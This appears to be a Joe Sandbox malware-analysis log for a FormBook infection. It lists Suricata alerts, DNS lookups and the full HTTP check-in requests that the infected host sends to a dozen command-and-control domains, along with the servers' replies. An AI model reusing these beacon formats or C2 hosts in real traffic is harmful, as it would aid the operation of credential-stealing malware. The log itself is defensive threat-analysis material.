Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49986 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50005 -> 142.93.62.161:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49996 -> 78.141.202.204:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50006 -> 142.93.62.161:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49988 -> 91.195.240.123:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49991 -> 91.195.240.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49941 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49997 -> 78.141.202.204:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49998 -> 78.141.202.204:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49992 -> 38.181.21.54:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50008 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50017 -> 192.186.57.30:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50001 -> 156.253.8.115:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50014 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50007 -> 142.93.62.161:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49981 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49994 -> 38.181.21.54:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49999 -> 78.141.202.204:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49989 -> 91.195.240.123:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50011 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50002 -> 156.253.8.115:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50019 -> 192.186.57.30:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50016 -> 192.186.57.30:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50023 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50012 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50021 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50004 -> 142.93.62.161:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50018 -> 192.186.57.30:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50009 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50010 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50013 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50020 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50015 -> 209.74.79.42:80

Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xqw5/?LH1t=PgL+w3suN5a2aCULPl51FNItlV/4WI7K9O4xPjIpeH5nqFCmW9XWPtqfHZxAiv3GMUXF9O3JJlPzg8a/nz+CvTwzwjYhAcTQZVp8pHsPK/qnGNvgsyt+JmhWInh71R764A==&fpJ=16J40rx8bHP8SV HTTP/1.1Host: www.arsanaroevir.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /c9n1/?LH1t=ZLTSClZbaB8MHbtnh5rLJMnGH02tmwkswIWWkpezpf5gYt1N/Ne/nHxaobrQcFYzFcMUaIPRgQqR+CHajlNKC8baT6T5RaLhCCkZuf2y0AAyYdjagCc/QRszW3FQa/qOkg==&fpJ=16J40rx8bHP8SV HTTP/1.1Host: www.sido247.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /lnrv/?fpJ=16J40rx8bHP8SV&LH1t=djiXcRDNleKKZNnl5ghctoCIjpFqMVObRlELgbdbd2yUtNpQZcruA+vypD1zHFI3XNbubPNky5LKo0aujLSTAktuQb20GKiolDp1oULDeQwsrOm+8EdlBmeZsA4zougguw== HTTP/1.1Host: www.emirates-visa.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /bzmd/?LH1t=Rt+43bg4Ok23e54YRfAH+vyFRMP1sUgI2DMHftvVCAd/nWF0JqXCSMibGLO2dcXMoNINCP/gJGrlf22QDBjVZjqHznYH4uPEIO/lAdIm4TOVCBTzftZlepKPWee8U8pSUA==&fpJ=16J40rx8bHP8SV HTTP/1.1Host: www.gisxj.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /6gca/?LH1t=fO7Vv7QIjIHgdzQpzhfCg2Co/QqQlpQJYQYE5YQp2rCSowSjXLls4N42Oq8UvYDhJwN7H88iyToSgsvsMFsw8qgJvlfr1LkCoo0259ZxSwy7A4vC8wcXbhrD0WwCEM58XQ==&fpJ=16J40rx8bHP8SV HTTP/1.1Host: www.yhk58.oneAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /s53m/?LH1t=LwZwQ/kCeukPoeELj8mhDOmmdBAOCBBa8wAeryDM2559JbEieA033ASYcolgYYbe9lt1XWmLZF5oY+x7iJ9G+2momiNt1MLXajJv2P/Ny5BJRrEwaDRFNfY0RmDClZANlQ==&fpJ=16J40rx8bHP8SV HTTP/1.1Host: www.zizjwk.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /160b/?LH1t=hWImcCcxiU/zFpbJ3SQ6wCxR9Fc5S9wUNOZCazoCcTKnw7sgTnGdjC8u7pn2czzrGxdfpZQLpAAjKTjZJ1WZPS8feXQCRiRlu+tLtQzibMS7IgX58gEncot0bgcnEtvyQA==&fpJ=16J40rx8bHP8SV HTTP/1.1Host: www.sssvip2.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /0ald/?LH1t=GvB+jYFK7sUEVqFEMuDG3C1X5D5RIs4zAP2rS1xhhNwzzZ6rrVY3WKggPmhykWotN1cmggGZQp5xPXoK3iAW/XAR3z3aIgZ3aLv5KCsbCaCc5hAzYI14dJhMOAu101TFNw==&fpJ=16J40rx8bHP8SV HTTP/1.1Host: www.pieceofpaper.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /fqlg/?fpJ=16J40rx8bHP8SV&LH1t=sQl5xb/hmEd8xAHtTI1KHbGKQqXRWyiPcilbd3ItRgiyLzuJnGXHmeDa2L3hm4hwlRjcRzlrASDvZ0AcIwfIw2xcCS/Bf2EkC2YHKHBr1XB8+HfoqQxFz1dUuY8R8/C0UQ== HTTP/1.1Host: www.aonline.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /o8f4/?LH1t=ooYqmC70ddwRtjg3e0x/wm7MwA1QQXIhRwSAdjgleoIh7kpuh6601uPN4XSsVUJuDgsJSN1iGUsKc/iLAYfhEKljCnL7CTlrze1oMQe9C3qLUpJZMYh8lsz5yyHVqSNemw==&fpJ=16J40rx8bHP8SV HTTP/1.1Host: www.glowups.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /i75c/?LH1t=6YpPt3cONEAD+3jtLDhd/Wpx5gzl+zwI9O5U7w1gcS11pHuKcF79farrxfROfOqahE6dsqUHnv6H8Vej6onxvENfYcLjeeOZCJ5HSE9XR48AmqL+ar7nJpXGb6U4weXk0Q==&fpJ=16J40rx8bHP8SV HTTP/1.1Host: www.yxni.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /vekd/?LH1t=4+03mnWHwBpjxbZK83upzCssoIYTYaC0AmwhJXtUcJzMctKA4SYWH8wIDV3ifRB0BjdWYS+2+kfE7i2zAqwY4crugBFAl0R3da1ul9ErZ5iShpdYh6TP2qhh9v/Ob9yjcQ==&fpJ=16J40rx8bHP8SV HTTP/1.1Host: www.absseguridad.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile

Source: global traffic	DNS traffic detected: DNS query: www.arsanaroevir.sbs
Source: global traffic	DNS traffic detected: DNS query: www.sido247.pro
Source: global traffic	DNS traffic detected: DNS query: www.emirates-visa.net
Source: global traffic	DNS traffic detected: DNS query: www.gisxj.sbs
Source: global traffic	DNS traffic detected: DNS query: www.yhk58.one
Source: global traffic	DNS traffic detected: DNS query: www.zizjwk.asia
Source: global traffic	DNS traffic detected: DNS query: www.sssvip2.shop
Source: global traffic	DNS traffic detected: DNS query: www.pieceofpaper.site
Source: global traffic	DNS traffic detected: DNS query: www.aonline.top
Source: global traffic	DNS traffic detected: DNS query: www.glowups.life
Source: global traffic	DNS traffic detected: DNS query: www.yxni.vip
Source: global traffic	DNS traffic detected: DNS query: www.absseguridad.online

Source: unknown

HTTP traffic detected: POST /c9n1/ HTTP/1.1Host: www.sido247.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 205Origin: http://www.sido247.proReferer: http://www.sido247.pro/c9n1/User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 MobileData Raw: 4c 48 31 74 3d 55 4a 37 79 42 53 4d 4c 42 32 70 7a 4d 73 5a 31 2f 63 4b 5a 47 2b 44 34 4f 45 47 76 6d 41 5a 57 2b 36 57 4f 67 70 37 44 72 34 30 69 58 36 6b 37 36 71 79 73 68 51 63 30 38 61 72 44 52 57 6b 4a 4f 2b 4a 73 5a 4d 2f 52 6c 55 36 62 35 52 54 38 6a 51 35 45 48 4d 58 63 49 65 44 54 41 49 76 63 4b 6d 6b 71 68 61 4f 62 2b 32 63 78 64 65 6d 6e 72 54 63 49 59 52 4a 7a 4a 30 68 43 58 63 6d 42 34 56 36 72 48 6f 39 4e 4f 33 31 51 6d 53 4a 4a 6b 43 46 6a 4e 35 4f 4b 4f 32 6f 79 4a 6e 4d 78 48 65 6c 62 4e 54 58 53 39 77 6c 73 30 67 37 65 58 49 46 72 55 30 52 6c 65 69 67 63 4f 6e 62 42 58 53 32 49 74 45 55 3d Data Ascii: LH1t=UJ7yBSMLB2pzMsZ1/cKZG+D4OEGvmAZW+6WOgp7Dr40iX6k76qyshQc08arDRWkJO+JsZM/RlU6b5RT8jQ5EHMXcIeDTAIvcKmkqhaOb+2cxdemnrTcIYRJzJ0hCXcmB4V6rHo9NO31QmSJJkCFjN5OKO2oyJnMxHelbNTXS9wls0g7eXIFrU0RleigcOnbBXS2ItEU=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 15:41:42 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66946a48-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 15:41:45 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66946a48-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 15:41:47 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66946a48-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 15:41:50 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66946a48-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 15:42:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"62c6ab1a-157"Content-Encoding: gzipData Raw: 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 50 bb 4e c4 30 10 ec f9 0a 63 89 d2 71 4e 74 79 5c 73 50 43 41 43 85 1c 67 13 5b b2 bd 96 bd 21 17 be 9e 73 c2 55 6c b3 33 a3 dd 19 69 ba c7 97 b7 cb c7 e7 fb 2b 33 e4 dd f9 a1 3b 16 bb 4d 67 a7 a4 3c b0 9c 74 cf 0d 51 cc 8d 94 da e1 32 ae 6a cb 22 93 22 ab 85 c6 40 10 a8 ca cf d5 92 05 a8 4c e2 54 29 af 7e 30 a8 35 57 1a bd 84 94 30 7d 45 35 83 f4 ca 96 73 15 34 88 11 0b 13 5e c5 68 c3 5c 95 60 ce f6 c8 01 d3 08 a9 e7 35 67 99 36 07 3d c7 6f 48 93 c3 b5 31 76 1c 21 b4 77 2e ae ff 94 ed ae 18 b0 b3 a1 e6 54 d7 4f ed 6a 47 32 07 8c 98 2d 59 0c 8d 1a 32 ba 85 a0 25 8c 4d 1d af ad 83 89 76 90 f6 c7 82 06 24 42 5f 20 67 87 5f cf 8b 0b 67 bb e3 1f 39 77 f2 e8 ea d6 9f dc 0b fc 05 66 f7 1e 64 57 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f7ePN0cqNty\sPCACg[!sUl3i+3;Mg<tQ2j""@LT)~05W0}E5s4^h\`5g6=oH1v!w.TOjG2-Y2%Mv$B_ g_g9wfdW0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 15:42:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"62c6ab1a-157"Content-Encoding: gzipData Raw: 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 50 bb 4e c4 30 10 ec f9 0a 63 89 d2 71 4e 74 79 5c 73 50 43 41 43 85 1c 67 13 5b b2 bd 96 bd 21 17 be 9e 73 c2 55 6c b3 33 a3 dd 19 69 ba c7 97 b7 cb c7 e7 fb 2b 33 e4 dd f9 a1 3b 16 bb 4d 67 a7 a4 3c b0 9c 74 cf 0d 51 cc 8d 94 da e1 32 ae 6a cb 22 93 22 ab 85 c6 40 10 a8 ca cf d5 92 05 a8 4c e2 54 29 af 7e 30 a8 35 57 1a bd 84 94 30 7d 45 35 83 f4 ca 96 73 15 34 88 11 0b 13 5e c5 68 c3 5c 95 60 ce f6 c8 01 d3 08 a9 e7 35 67 99 36 07 3d c7 6f 48 93 c3 b5 31 76 1c 21 b4 77 2e ae ff 94 ed ae 18 b0 b3 a1 e6 54 d7 4f ed 6a 47 32 07 8c 98 2d 59 0c 8d 1a 32 ba 85 a0 25 8c 4d 1d af ad 83 89 76 90 f6 c7 82 06 24 42 5f 20 67 87 5f cf 8b 0b 67 bb e3 1f 39 77 f2 e8 ea d6 9f dc 0b fc 05 66 f7 1e 64 57 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f7ePN0cqNty\sPCACg[!sUl3i+3;Mg<tQ2j""@LT)~05W0}E5s4^h\`5g6=oH1v!w.TOjG2-Y2%Mv$B_ g_g9wfdW0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 15:42:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"62c6ab1a-157"Content-Encoding: gzipData Raw: 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 50 bb 4e c4 30 10 ec f9 0a 63 89 d2 71 4e 74 79 5c 73 50 43 41 43 85 1c 67 13 5b b2 bd 96 bd 21 17 be 9e 73 c2 55 6c b3 33 a3 dd 19 69 ba c7 97 b7 cb c7 e7 fb 2b 33 e4 dd f9 a1 3b 16 bb 4d 67 a7 a4 3c b0 9c 74 cf 0d 51 cc 8d 94 da e1 32 ae 6a cb 22 93 22 ab 85 c6 40 10 a8 ca cf d5 92 05 a8 4c e2 54 29 af 7e 30 a8 35 57 1a bd 84 94 30 7d 45 35 83 f4 ca 96 73 15 34 88 11 0b 13 5e c5 68 c3 5c 95 60 ce f6 c8 01 d3 08 a9 e7 35 67 99 36 07 3d c7 6f 48 93 c3 b5 31 76 1c 21 b4 77 2e ae ff 94 ed ae 18 b0 b3 a1 e6 54 d7 4f ed 6a 47 32 07 8c 98 2d 59 0c 8d 1a 32 ba 85 a0 25 8c 4d 1d af ad 83 89 76 90 f6 c7 82 06 24 42 5f 20 67 87 5f cf 8b 0b 67 bb e3 1f 39 77 f2 e8 ea d6 9f dc 0b fc 05 66 f7 1e 64 57 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f7ePN0cqNty\sPCACg[!sUl3i+3;Mg<tQ2j""@LT)~05W0}E5s4^h\`5g6=oH1v!w.TOjG2-Y2%Mv$B_ g_g9wfdW0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 15:42:30 GMTContent-Type: text/htmlContent-Length: 343Connection: closeVary: Accept-EncodingETag: "62c6ab1a-157"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RiDMbD0ppASrrKLqjHNew%2FfGsg2vWc%2FWk24d%2FBKDTWHDlhcA9RtJeEOW5tjdYrhhUij0w5gAdYBopfDaxWlnQl3QEVh9xL2daZxpCHnBPaItz9I2OxyIhVhPecr9b6EuRm8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffdc7287b3ec32e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1611&rtt_var=805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
